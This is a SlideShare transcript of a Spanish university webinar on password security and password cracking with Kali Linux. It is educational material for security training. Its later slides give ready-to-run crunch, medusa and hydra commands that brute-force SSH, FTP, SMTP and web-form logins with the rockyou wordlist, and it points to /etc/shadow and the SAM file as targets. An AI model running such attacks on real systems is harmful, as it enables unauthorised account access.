SlideShare ist ein Scribd-Unternehmen logo
1 von 61
Downloaden Sie, um offline zu lesen
Profe Carlos Leal
Password Cracking con Kali LInux
Webminar
Octubre 2021
¿QUÉ ES KALI LINUX?
Una explicación Necesaria
Nombre del curso:
• Seguridad Informática y sus implicaciones Legales
en los ciberdelitos
Duración
• 40 horas (Dominical)
Modalidad
• Virtual
Información a
• dpec@uam.edu.ni
• https://posgrados.uam.edu.ni
Curso de Seguridad Informática en la UAM
¿Qué es Kali Linux?
•Distribución de
GNU/Linux
•Basada en Debian
•Soportada y mantenida
por Offensive Security.
¿Qué es Kali Linux?
¿Qué es Kali Linux?
https://www.offensive-security.com/
¿Qué es Kali Linux?
•Herramienta avanzada para realizar
•Pruebas de penetración y
•Auditorías de seguridad
informática.
¿Qué es Kali Linux?
¿Qué es Kali Linux?
• Con Kali Linux se puede
realizar:
• Pruebas de penetración
• Análisis forense
• Ingeniería inversa
• Pruebas de estrés
• Y un largo etcétera
¿Qué es Kali Linux?
Kali Linux
•Apareció en el año 2013
•Reformulación de Backtrack.
•Abandona a Ubuntu y se une a Debian
•Ahora es Rolling realease
Actualización Constante
• Parches
• Actualizaciones
• No es necesario reinstalar cuando sale un nueva versión
Rolling Release
• Permite mantener actualizado el sistema con todas las
aplicaciones instaladas
¿Rolling Release?
Actualización Constante
• Cuatro actualizaciones
mayores al año
• Las imágenes de instalación se
actualizan cada semana
• El código fuente de Kali Linux
está disponible en
http://git.kali.org/gitweb/
¿Rolling Release?
Kali Linux
• Kernel personalizado
• Servicios de red y Bluetooth
deshabilitados de manera
predeterminada
• Número mínimo de repositorios
operados por un grupo muy
pequeño de personas.
¿Qué hace a Kali Linux Diferente?
• No es para novato.
• No es para aprender Linux
• No es para uso cotidiano
• No es para jugar
• No es para diseño web
• No es para programar
• Diseñada por y para profesionales
de la seguridad informática
Kali
LInux
¿Kali Linux es bueno para mi?
• Sitio oficial de descarga:
https://www.kali.org/get-kali/
No descargar Kali desde otro sitio
• Hay versiones para:
– 32 Bits
– 64 Bits
– Imágenes preinstaladas para
VMWare y VirtualBox
– Diferentes imágenes para móviles
¿De donde se descarga?
Máquina Virtual con VirtualBox
• 80 GB de Disco Duro
• 2048 MB de RAM - (64 Bits)
• Dos núcleos de procesamiento
• Acceso a Internet (no puede faltar)
Requerimientos mínimos para instalación
Otros sitios de interés
En resumen
Tipo Linux
Basado en Debian
Origen Suiza
Arquitectura armel, armhf, i386, x86_64
Categoría Recuperación de datos, Análisis forense, Live Medium,
Raspberry Pi, Security
Página
Principal
http://www.kali.org/
Descarga https://www.kali.org/get-kali/
CONTRASEÑAS
Una explicación más que necesaria
Nombre del curso:
• Seguridad Informática y sus implicaciones Legales
en los ciberdelitos
Duración
• 40 horas (Dominical)
Modalidad
• Virtual
Información a
• dpec@uam.edu.ni
• https://posgrados.uam.edu.ni
Curso de Seguridad Informática en la UAM
Formas de Autenticación
Por algo que se conoce
Formas de Autenticación
Por algo que se tiene
Formas de Autenticación
Por algo
que se es
Formas de Autenticación
• Seguridad nivel Edna Moda
– Contraseña
– Biometría
• Reconocimiento vascular (Mano)
• Retina
• Reconocimiento de voz
– Sensores de presencia
Formas de Autenticación
La contraseña
• Es la forma más común de
autenticación
• Debe mantenerse en secreto para
impedir el acceso no autorizado.
• Debe ser personal e intransferible.
• Se debe cambiar regularmente
• No usar la misma para todo
Contraseñas
Balance entre seguridad y comodidad
Contraseña fácil de recordar es fácil de adivinar
o Con contraseñas difíciles los
usuarios tienden a:
o Escribirlas
o Tener un archivo para almacenar
todas sus contraseñas
o Olvidarlas y solicitar el
restablecimiento
o Usar la misma contraseña para todo
Balance entre seguridad y comodidad
o Requisitos más estrictos para las
contraseñas:
o Más de 8 caracteres
o No utilizar palabras del diccionario
o Utilizar letras y números
o Combinación de mayúsculas,
minúsculas y caracteres no
alfanuméricos (!”#$%&/()=?¡+{})
o Cambiar Regularmente
Balance entre seguridad y comodidad
ESET password Generator
https://www.eset.com/int/password-generator/
kaspersky password check
https://password.kaspersky.com/es/
o Formas de almacenar la
contraseña
o Algunos sistemas utilizan archivos
para guardar las contraseñas
o En Windows ➔
C:WindowsSystem32configSAM
o En GNU/Linux ➔ /etc/passwd y
/etc/shadow
Si un atacante tiene acceso a estos archivos la
seguridad se verá comprometida
Factores de seguridad de las contraseñas
o Longevidad de una contraseña
o Las contraseñas deben ser
cambiadas cada cierto tiempo
o No forzar cambios de contraseña
con demasiada frecuencia
o Al implementar este tipo de política
se requiere una cuidadosa
consideración de los factores
humanos.
Factores de seguridad de las contraseñas
• Ataque de diccionario:
– Utiliza una técnica muy sencilla una lista detallada
(diccionario) con nombres de usuario y/o
contraseñas
– El ataque consiste en probar todas y cada una de
las posibles combinaciones
Ataques a las contraseñas
• Ataque de fuerza bruta:
– No utiliza una lista limitada
– Usa combinaciones de todas las
letras, números y caracteres del
teclado.
Ataques a las contraseñas
• Ataque basado en reglas
– Se utiliza cuando de tiene alguna
información sobre la contraseña.
Ataques a las contraseñas
• Ataque de syllabus (hibrido): Es
una combinación de los ataques
de diccionarios y de fuerza bruta
• Símbolos de seguridad – Capcha:
Son similares a las contraseñas e
incluso se pueden combinar, la
principal característica es que el
usuario debe escribir un código
aleatorio.
Alternativas a las contraseñas
• Controles de acceso: Se basa en
la criptografía de clave pública, la
llave pública se queda en el
servidor y la clave privada se la
lleva el usuario en un dispositivo
(memoria USB, disco, token, etc.)
Alternativas a las contraseñas
• Métodos biométricos:
– Reconocimiento de iris
– Reconocimiento de Facial 2D y 3D
– Reconocimiento vascular
– Pulsaciones cardíacas
– Ondas cerebrales
Alternativas a las contraseñas
• Autenticación en dos pasos:
El usuario escribe su nombre de
usuario y contraseña y luego recibe
una llamada, mensaje de texto o
correo con un código para acceder.
Alternativas a las contraseñas
• Mediante dispositivos móviles:
– Existen aplicaciones específicas.
– La contraseña sale desde el
dispositivo móvil hasta el servidor
– Puede necesitar un sitio web o
servidor de un tercero
Alternativas a las contraseñas
El entorno de Kali Linux
• Inicio de sesión
• Recorrido rápido por las
herramientas
PASSWORD CRACKING EN KALI LINUX
Ahora si
Nombre del curso:
• Seguridad Informática y sus implicaciones Legales
en los ciberdelitos
Duración
• 40 horas (Dominical)
Modalidad
• Virtual
Información a
• dpec@uam.edu.ni
• https://posgrados.uam.edu.ni
Curso de Seguridad Informática en la UAM
• El atacante ya identificó
información importante:
– Dirección IP - 192.168.1.1
– Puertos abiertos - puerto 80 o 25
– Protocolos - HTTP o SMTP
– Nombres de usuario – admin, test,
etc.
Antes de iniciar el ataque de contraseñas
CRUNCH
Ataque de fuerza bruta
Generar contraseñas con crunch
crunch <min> <max> <caracteres> -t <plantilla> -o <archivo de salida>
Ejemplo:
• crunch 7 7 abcd987 -t abc@@@@ -o /root/file.txt
webminar ataques de fuerza bruta kali linux
ATAQUE DE DICCIONARIO
Varias opciones
Diccionarios en línea
• Se pueden bajar diccionarios de contraseñas de varios sitios
– http://www.outpost9.com/files/WordLists.html
– http://packetstormsecurity.org/Crackers/wordlists/
– http://www.ai.uga.edu/ftplib/natural-language/moby/
– http://wordlist.sourceforge.net/
Diccionarios en Kali
Personalmente recomiendo descomprimir el archivo rockyou.txt.gz
ATAQUE DE FUERZA BRUTA
Con Kali Linux
• Aplicación para realizar ataques de Fuerza
Bruta
• Está basado en hilos para pruebas
concurrente a varios hosts, usuarios o
contraseñas.
• Posee un diseño modular, cada servicio
existe como un módulo independiente en
archivos .mod.
• medusa -d para ver los módulos disponibles
Medusa
Medusa
• medusa -h 192.168.56.250 -u root -P pass.txt -M ssh -n 2222 -f
Host
Usuarios
Diccionario
Módulo SSH
Puerto
Detenerse al
encontrar un
usuario y
contraseña
Medusa en Acción
Medusa
• medusa -h 192.168.10.12 -u profe -P pass.txt -M ssh -n 22 -f
Host
Usuarios
Diccionario
Módulo SSH
Puerto
Detenerse al
encontrar un
usuario y
contraseña
Medusa
• De una forma similar puede ser usado en otros servicios
medusa -h 192.168.10.105 -u k3170makan -P /usr/share/wordlists/rockyou.txt –M ftp
medusa -h 192.168.10.105 -u ungaman -P /usr/share/wordlists/rockyou.txt -M http
medusa -h 192.168.10.105 –u decks -P /usr/share/wordlists/rockyou.txt –M web-form
hydra en Acción
Hydra
• Es desarrollado por The Hacker's Choice (THC) es decir no tiene
nada que ver con el capitán américa
• También soporta variedad de protocolos
• Es ideal para atacar servidores de correo porque puede
centrarse en un IP y un usuario
Hydra
• hydra -l profe -p /usr/share/wordlist/rockyou.txt ssh
• hydra -l admin -p /root/password.txt 192.168.1.1 smtp
• hydra -L user.txt -p pass.txt http_proxy://192.168.16.1
hydra
• hydra -l profe -P pass.txt 192.168.10.12 -t 4 ssh
Host
Usuarios
Diccionario
Módulo SSH
Más allá de Kali Linux
ophcrack John the Ripper
¿Dudas?
¿Preguntas?

Weitere ähnliche Inhalte

Was ist angesagt?

"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
Nmap basics
Nmap basicsNmap basics
Nmap basicsitmind4u
 
Metasploit
MetasploitMetasploit
Metasploithenelpj
 
Malware Static Analysis
Malware Static AnalysisMalware Static Analysis
Malware Static AnalysisHossein Yavari
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]RootedCON
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
Intruders and Viruses in Network Security NS9
Intruders and Viruses in Network Security NS9Intruders and Viruses in Network Security NS9
Intruders and Viruses in Network Security NS9koolkampus
 
Onion routing and tor: Fundamentals and Anonymity
Onion routing and tor: Fundamentals and AnonymityOnion routing and tor: Fundamentals and Anonymity
Onion routing and tor: Fundamentals and Anonymityanurag singh
 
Email security
Email securityEmail security
Email securitykumarviji
 
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...Lenur Dzhemiliev
 
Secure shell ppt
Secure shell pptSecure shell ppt
Secure shell pptsravya raju
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTop 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTerrance Medina
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitRaghav Bisht
 

Was ist angesagt? (20)

"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Xss ppt
Xss pptXss ppt
Xss ppt
 
Metasploit
MetasploitMetasploit
Metasploit
 
Malware Static Analysis
Malware Static AnalysisMalware Static Analysis
Malware Static Analysis
 
Session Hijacking
Session HijackingSession Hijacking
Session Hijacking
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
 
Hydra
HydraHydra
Hydra
 
Wannacry
WannacryWannacry
Wannacry
 
Web application security
Web application securityWeb application security
Web application security
 
Intruders and Viruses in Network Security NS9
Intruders and Viruses in Network Security NS9Intruders and Viruses in Network Security NS9
Intruders and Viruses in Network Security NS9
 
NMAP
NMAPNMAP
NMAP
 
Onion routing and tor: Fundamentals and Anonymity
Onion routing and tor: Fundamentals and AnonymityOnion routing and tor: Fundamentals and Anonymity
Onion routing and tor: Fundamentals and Anonymity
 
Email security
Email securityEmail security
Email security
 
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
 
OS Security 2009
OS Security 2009OS Security 2009
OS Security 2009
 
Secure shell ppt
Secure shell pptSecure shell ppt
Secure shell ppt
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
 
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTop 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilities
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & Metasploit
 

Ähnlich wie webminar ataques de fuerza bruta kali linux

Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia españolIt-servicios
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia españolKrls Avilez
 
Hack & beers lleida seguridad en desarrollo fullstack
Hack & beers lleida   seguridad en desarrollo fullstackHack & beers lleida   seguridad en desarrollo fullstack
Hack & beers lleida seguridad en desarrollo fullstackMarc Pàmpols
 
Curso Virtual Fundamentos de Hacking Etico 2017
Curso Virtual Fundamentos de Hacking Etico 2017Curso Virtual Fundamentos de Hacking Etico 2017
Curso Virtual Fundamentos de Hacking Etico 2017Alonso Caballero
 
S8-AI-4.2 Amenazas, vulnerabilidades y ataques a la ciberseguridad
S8-AI-4.2 Amenazas, vulnerabilidades y ataques a la ciberseguridadS8-AI-4.2 Amenazas, vulnerabilidades y ataques a la ciberseguridad
S8-AI-4.2 Amenazas, vulnerabilidades y ataques a la ciberseguridadLuis Fernando Aguas Bucheli
 
Fedora Security LAB
Fedora Security LABFedora Security LAB
Fedora Security LABBaruch Ramos
 
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...VOIP2DAY
 
Ransonware: introducción a nuevo Virus Informático
Ransonware: introducción a nuevo Virus InformáticoRansonware: introducción a nuevo Virus Informático
Ransonware: introducción a nuevo Virus InformáticoJuan Astudillo
 
Webinar Gratuito: Analizar una Imagen RAM con Volatility Framework
Webinar Gratuito: Analizar una Imagen RAM con Volatility FrameworkWebinar Gratuito: Analizar una Imagen RAM con Volatility Framework
Webinar Gratuito: Analizar una Imagen RAM con Volatility FrameworkAlonso Caballero
 
Mecanismos de autenticación-identificación. Vulneración y cracking de contras...
Mecanismos de autenticación-identificación. Vulneración y cracking de contras...Mecanismos de autenticación-identificación. Vulneración y cracking de contras...
Mecanismos de autenticación-identificación. Vulneración y cracking de contras...Alejandro Ramos
 
Taller Gratuito Virtual de Introducción al Pentesting
Taller Gratuito Virtual de Introducción al PentestingTaller Gratuito Virtual de Introducción al Pentesting
Taller Gratuito Virtual de Introducción al PentestingAlonso Caballero
 
Taller Gratuito Virtual de Introducción al Pentesting
Taller Gratuito Virtual de Introducción al PentestingTaller Gratuito Virtual de Introducción al Pentesting
Taller Gratuito Virtual de Introducción al PentestingAlonso Caballero
 
Backbox Distribución deriva de Ubuntu
Backbox Distribución deriva de UbuntuBackbox Distribución deriva de Ubuntu
Backbox Distribución deriva de UbuntuJosé Moreno
 
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)TR Hirecom
 
Summer boot camp sciende umh
Summer boot camp sciende umhSummer boot camp sciende umh
Summer boot camp sciende umhAlejandro Quesada
 
Webinar Gratuito: "Nikto para Pentesting"
Webinar Gratuito: "Nikto para Pentesting"Webinar Gratuito: "Nikto para Pentesting"
Webinar Gratuito: "Nikto para Pentesting"Alonso Caballero
 

Ähnlich wie webminar ataques de fuerza bruta kali linux (20)

Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia español
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia español
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia español
 
Hack & beers lleida seguridad en desarrollo fullstack
Hack & beers lleida   seguridad en desarrollo fullstackHack & beers lleida   seguridad en desarrollo fullstack
Hack & beers lleida seguridad en desarrollo fullstack
 
Curso Virtual Fundamentos de Hacking Etico 2017
Curso Virtual Fundamentos de Hacking Etico 2017Curso Virtual Fundamentos de Hacking Etico 2017
Curso Virtual Fundamentos de Hacking Etico 2017
 
14-Seguridad de la Información
14-Seguridad de la Información14-Seguridad de la Información
14-Seguridad de la Información
 
Conferencia Ethical Hacking- UISRAEL
Conferencia Ethical Hacking- UISRAELConferencia Ethical Hacking- UISRAEL
Conferencia Ethical Hacking- UISRAEL
 
S8-AI-4.2 Amenazas, vulnerabilidades y ataques a la ciberseguridad
S8-AI-4.2 Amenazas, vulnerabilidades y ataques a la ciberseguridadS8-AI-4.2 Amenazas, vulnerabilidades y ataques a la ciberseguridad
S8-AI-4.2 Amenazas, vulnerabilidades y ataques a la ciberseguridad
 
Fedora Security LAB
Fedora Security LABFedora Security LAB
Fedora Security LAB
 
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...
 
Ransonware: introducción a nuevo Virus Informático
Ransonware: introducción a nuevo Virus InformáticoRansonware: introducción a nuevo Virus Informático
Ransonware: introducción a nuevo Virus Informático
 
Seguridad y proteccion
Seguridad y proteccionSeguridad y proteccion
Seguridad y proteccion
 
Webinar Gratuito: Analizar una Imagen RAM con Volatility Framework
Webinar Gratuito: Analizar una Imagen RAM con Volatility FrameworkWebinar Gratuito: Analizar una Imagen RAM con Volatility Framework
Webinar Gratuito: Analizar una Imagen RAM con Volatility Framework
 
Mecanismos de autenticación-identificación. Vulneración y cracking de contras...
Mecanismos de autenticación-identificación. Vulneración y cracking de contras...Mecanismos de autenticación-identificación. Vulneración y cracking de contras...
Mecanismos de autenticación-identificación. Vulneración y cracking de contras...
 
Taller Gratuito Virtual de Introducción al Pentesting
Taller Gratuito Virtual de Introducción al PentestingTaller Gratuito Virtual de Introducción al Pentesting
Taller Gratuito Virtual de Introducción al Pentesting
 
Taller Gratuito Virtual de Introducción al Pentesting
Taller Gratuito Virtual de Introducción al PentestingTaller Gratuito Virtual de Introducción al Pentesting
Taller Gratuito Virtual de Introducción al Pentesting
 
Backbox Distribución deriva de Ubuntu
Backbox Distribución deriva de UbuntuBackbox Distribución deriva de Ubuntu
Backbox Distribución deriva de Ubuntu
 
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
 
Summer boot camp sciende umh
Summer boot camp sciende umhSummer boot camp sciende umh
Summer boot camp sciende umh
 
Webinar Gratuito: "Nikto para Pentesting"
Webinar Gratuito: "Nikto para Pentesting"Webinar Gratuito: "Nikto para Pentesting"
Webinar Gratuito: "Nikto para Pentesting"
 

Mehr von Carlos Antonio Leal Saballos

Webminar - Seguridad - Backups y Encriptación [ST Mary].pdf
Webminar - Seguridad - Backups y Encriptación [ST Mary].pdfWebminar - Seguridad - Backups y Encriptación [ST Mary].pdf
Webminar - Seguridad - Backups y Encriptación [ST Mary].pdfCarlos Antonio Leal Saballos
 

Mehr von Carlos Antonio Leal Saballos (20)

Webminar - Seguridad - Backups y Encriptación [ST Mary].pdf
Webminar - Seguridad - Backups y Encriptación [ST Mary].pdfWebminar - Seguridad - Backups y Encriptación [ST Mary].pdf
Webminar - Seguridad - Backups y Encriptación [ST Mary].pdf
 
Identificación de fuentes confiables
Identificación de fuentes confiablesIdentificación de fuentes confiables
Identificación de fuentes confiables
 
Uso del escaner de puertos nmap
Uso del escaner de puertos nmapUso del escaner de puertos nmap
Uso del escaner de puertos nmap
 
Presentacion ubuntu 20.04
Presentacion ubuntu 20.04Presentacion ubuntu 20.04
Presentacion ubuntu 20.04
 
¿Que es linux?
¿Que es linux?¿Que es linux?
¿Que es linux?
 
Introduccion to openSUSE 42.3
Introduccion to openSUSE 42.3Introduccion to openSUSE 42.3
Introduccion to openSUSE 42.3
 
Que es linux 2018
Que es linux 2018Que es linux 2018
Que es linux 2018
 
Cultura linux
Cultura linuxCultura linux
Cultura linux
 
Historia de internet y la web
Historia de internet y la webHistoria de internet y la web
Historia de internet y la web
 
FTP en centos 7
FTP en centos 7FTP en centos 7
FTP en centos 7
 
ssh en centos 7
ssh en centos 7ssh en centos 7
ssh en centos 7
 
Uso de yum
Uso de yumUso de yum
Uso de yum
 
Hardware para servidores 2017
Hardware para servidores 2017Hardware para servidores 2017
Hardware para servidores 2017
 
Instalación de Centos
Instalación de CentosInstalación de Centos
Instalación de Centos
 
Proceso de diseño ingeniería
Proceso de diseño ingenieríaProceso de diseño ingeniería
Proceso de diseño ingeniería
 
Sistemas numericos
Sistemas numericosSistemas numericos
Sistemas numericos
 
Sistema internacional de unidades
Sistema internacional de unidadesSistema internacional de unidades
Sistema internacional de unidades
 
La profesión del ingeniero
La profesión del ingenieroLa profesión del ingeniero
La profesión del ingeniero
 
La profesión del ingeniero
La profesión del ingenieroLa profesión del ingeniero
La profesión del ingeniero
 
Historia de la ingeniería
Historia de la ingenieríaHistoria de la ingeniería
Historia de la ingeniería
 

Kürzlich hochgeladen

La electricidad y la electrónica.pdf.iluw
La electricidad y la electrónica.pdf.iluwLa electricidad y la electrónica.pdf.iluw
La electricidad y la electrónica.pdf.iluwDanielaEspaa3
 
PRESENTACION DE "CASO NOKIA" // PDF.EDU.
PRESENTACION DE "CASO NOKIA" // PDF.EDU.PRESENTACION DE "CASO NOKIA" // PDF.EDU.
PRESENTACION DE "CASO NOKIA" // PDF.EDU.SARA BUENDIA RIOJA
 
Taller grupal de electricidad y electrónica
Taller grupal de electricidad y electrónicaTaller grupal de electricidad y electrónica
Taller grupal de electricidad y electrónicasofiacardonasolanill
 
Cuadernillo de Comunicación 1. Primer grado de Primaria.pdf
Cuadernillo de Comunicación 1. Primer grado de Primaria.pdfCuadernillo de Comunicación 1. Primer grado de Primaria.pdf
Cuadernillo de Comunicación 1. Primer grado de Primaria.pdfRosaAmeliaLlacsahuan
 
Taller Evaluativo Tecnologías Web 2.0.docx
Taller Evaluativo Tecnologías Web 2.0.docxTaller Evaluativo Tecnologías Web 2.0.docx
Taller Evaluativo Tecnologías Web 2.0.docxSANTIAGOREYES92
 
Charla eCommerce Day Bolivia 2024 - Comercio Electrónico en Bolivia 2024
Charla eCommerce Day Bolivia 2024 - Comercio Electrónico en Bolivia 2024Charla eCommerce Day Bolivia 2024 - Comercio Electrónico en Bolivia 2024
Charla eCommerce Day Bolivia 2024 - Comercio Electrónico en Bolivia 2024Mariano Cabrera Lanfranconi
 
Violencia sexual a través de Internet [ICAS 2024]
Violencia sexual a través de Internet [ICAS 2024]Violencia sexual a través de Internet [ICAS 2024]
Violencia sexual a través de Internet [ICAS 2024]QuantiKa14
 

Kürzlich hochgeladen (7)

La electricidad y la electrónica.pdf.iluw
La electricidad y la electrónica.pdf.iluwLa electricidad y la electrónica.pdf.iluw
La electricidad y la electrónica.pdf.iluw
 
PRESENTACION DE "CASO NOKIA" // PDF.EDU.
PRESENTACION DE "CASO NOKIA" // PDF.EDU.PRESENTACION DE "CASO NOKIA" // PDF.EDU.
PRESENTACION DE "CASO NOKIA" // PDF.EDU.
 
Taller grupal de electricidad y electrónica
Taller grupal de electricidad y electrónicaTaller grupal de electricidad y electrónica
Taller grupal de electricidad y electrónica
 
Cuadernillo de Comunicación 1. Primer grado de Primaria.pdf
Cuadernillo de Comunicación 1. Primer grado de Primaria.pdfCuadernillo de Comunicación 1. Primer grado de Primaria.pdf
Cuadernillo de Comunicación 1. Primer grado de Primaria.pdf
 
Taller Evaluativo Tecnologías Web 2.0.docx
Taller Evaluativo Tecnologías Web 2.0.docxTaller Evaluativo Tecnologías Web 2.0.docx
Taller Evaluativo Tecnologías Web 2.0.docx
 
Charla eCommerce Day Bolivia 2024 - Comercio Electrónico en Bolivia 2024
Charla eCommerce Day Bolivia 2024 - Comercio Electrónico en Bolivia 2024Charla eCommerce Day Bolivia 2024 - Comercio Electrónico en Bolivia 2024
Charla eCommerce Day Bolivia 2024 - Comercio Electrónico en Bolivia 2024
 
Violencia sexual a través de Internet [ICAS 2024]
Violencia sexual a través de Internet [ICAS 2024]Violencia sexual a través de Internet [ICAS 2024]
Violencia sexual a través de Internet [ICAS 2024]
 

webminar ataques de fuerza bruta kali linux

  • 1. Profe Carlos Leal Password Cracking con Kali LInux Webminar Octubre 2021
  • 2. ¿QUÉ ES KALI LINUX? Una explicación Necesaria
  • 3. Nombre del curso: • Seguridad Informática y sus implicaciones Legales en los ciberdelitos Duración • 40 horas (Dominical) Modalidad • Virtual Información a • dpec@uam.edu.ni • https://posgrados.uam.edu.ni Curso de Seguridad Informática en la UAM
  • 4. ¿Qué es Kali Linux? •Distribución de GNU/Linux •Basada en Debian •Soportada y mantenida por Offensive Security. ¿Qué es Kali Linux?
  • 5. ¿Qué es Kali Linux? https://www.offensive-security.com/
  • 6. ¿Qué es Kali Linux? •Herramienta avanzada para realizar •Pruebas de penetración y •Auditorías de seguridad informática. ¿Qué es Kali Linux?
  • 7. ¿Qué es Kali Linux? • Con Kali Linux se puede realizar: • Pruebas de penetración • Análisis forense • Ingeniería inversa • Pruebas de estrés • Y un largo etcétera ¿Qué es Kali Linux?
  • 8. Kali Linux •Apareció en el año 2013 •Reformulación de Backtrack. •Abandona a Ubuntu y se une a Debian •Ahora es Rolling realease
  • 9. Actualización Constante • Parches • Actualizaciones • No es necesario reinstalar cuando sale un nueva versión Rolling Release • Permite mantener actualizado el sistema con todas las aplicaciones instaladas ¿Rolling Release?
  • 10. Actualización Constante • Cuatro actualizaciones mayores al año • Las imágenes de instalación se actualizan cada semana • El código fuente de Kali Linux está disponible en http://git.kali.org/gitweb/ ¿Rolling Release?
  • 11. Kali Linux • Kernel personalizado • Servicios de red y Bluetooth deshabilitados de manera predeterminada • Número mínimo de repositorios operados por un grupo muy pequeño de personas. ¿Qué hace a Kali Linux Diferente?
  • 12. • No es para novato. • No es para aprender Linux • No es para uso cotidiano • No es para jugar • No es para diseño web • No es para programar • Diseñada por y para profesionales de la seguridad informática Kali LInux ¿Kali Linux es bueno para mi?
  • 13. • Sitio oficial de descarga: https://www.kali.org/get-kali/ No descargar Kali desde otro sitio • Hay versiones para: – 32 Bits – 64 Bits – Imágenes preinstaladas para VMWare y VirtualBox – Diferentes imágenes para móviles ¿De donde se descarga?
  • 14. Máquina Virtual con VirtualBox • 80 GB de Disco Duro • 2048 MB de RAM - (64 Bits) • Dos núcleos de procesamiento • Acceso a Internet (no puede faltar) Requerimientos mínimos para instalación
  • 15. Otros sitios de interés
  • 16. En resumen Tipo Linux Basado en Debian Origen Suiza Arquitectura armel, armhf, i386, x86_64 Categoría Recuperación de datos, Análisis forense, Live Medium, Raspberry Pi, Security Página Principal http://www.kali.org/ Descarga https://www.kali.org/get-kali/
  • 18. Nombre del curso: • Seguridad Informática y sus implicaciones Legales en los ciberdelitos Duración • 40 horas (Dominical) Modalidad • Virtual Información a • dpec@uam.edu.ni • https://posgrados.uam.edu.ni Curso de Seguridad Informática en la UAM
  • 19. Formas de Autenticación Por algo que se conoce
  • 20. Formas de Autenticación Por algo que se tiene
  • 23. • Seguridad nivel Edna Moda – Contraseña – Biometría • Reconocimiento vascular (Mano) • Retina • Reconocimiento de voz – Sensores de presencia Formas de Autenticación
  • 24. La contraseña • Es la forma más común de autenticación • Debe mantenerse en secreto para impedir el acceso no autorizado. • Debe ser personal e intransferible. • Se debe cambiar regularmente • No usar la misma para todo Contraseñas
  • 25. Balance entre seguridad y comodidad Contraseña fácil de recordar es fácil de adivinar
  • 26. o Con contraseñas difíciles los usuarios tienden a: o Escribirlas o Tener un archivo para almacenar todas sus contraseñas o Olvidarlas y solicitar el restablecimiento o Usar la misma contraseña para todo Balance entre seguridad y comodidad
  • 27. o Requisitos más estrictos para las contraseñas: o Más de 8 caracteres o No utilizar palabras del diccionario o Utilizar letras y números o Combinación de mayúsculas, minúsculas y caracteres no alfanuméricos (!”#$%&/()=?¡+{}) o Cambiar Regularmente Balance entre seguridad y comodidad
  • 28. ESET password Generator https://www.eset.com/int/password-generator/ kaspersky password check https://password.kaspersky.com/es/
  • 29. o Formas de almacenar la contraseña o Algunos sistemas utilizan archivos para guardar las contraseñas o En Windows ➔ C:WindowsSystem32configSAM o En GNU/Linux ➔ /etc/passwd y /etc/shadow Si un atacante tiene acceso a estos archivos la seguridad se verá comprometida Factores de seguridad de las contraseñas
  • 30. o Longevidad de una contraseña o Las contraseñas deben ser cambiadas cada cierto tiempo o No forzar cambios de contraseña con demasiada frecuencia o Al implementar este tipo de política se requiere una cuidadosa consideración de los factores humanos. Factores de seguridad de las contraseñas
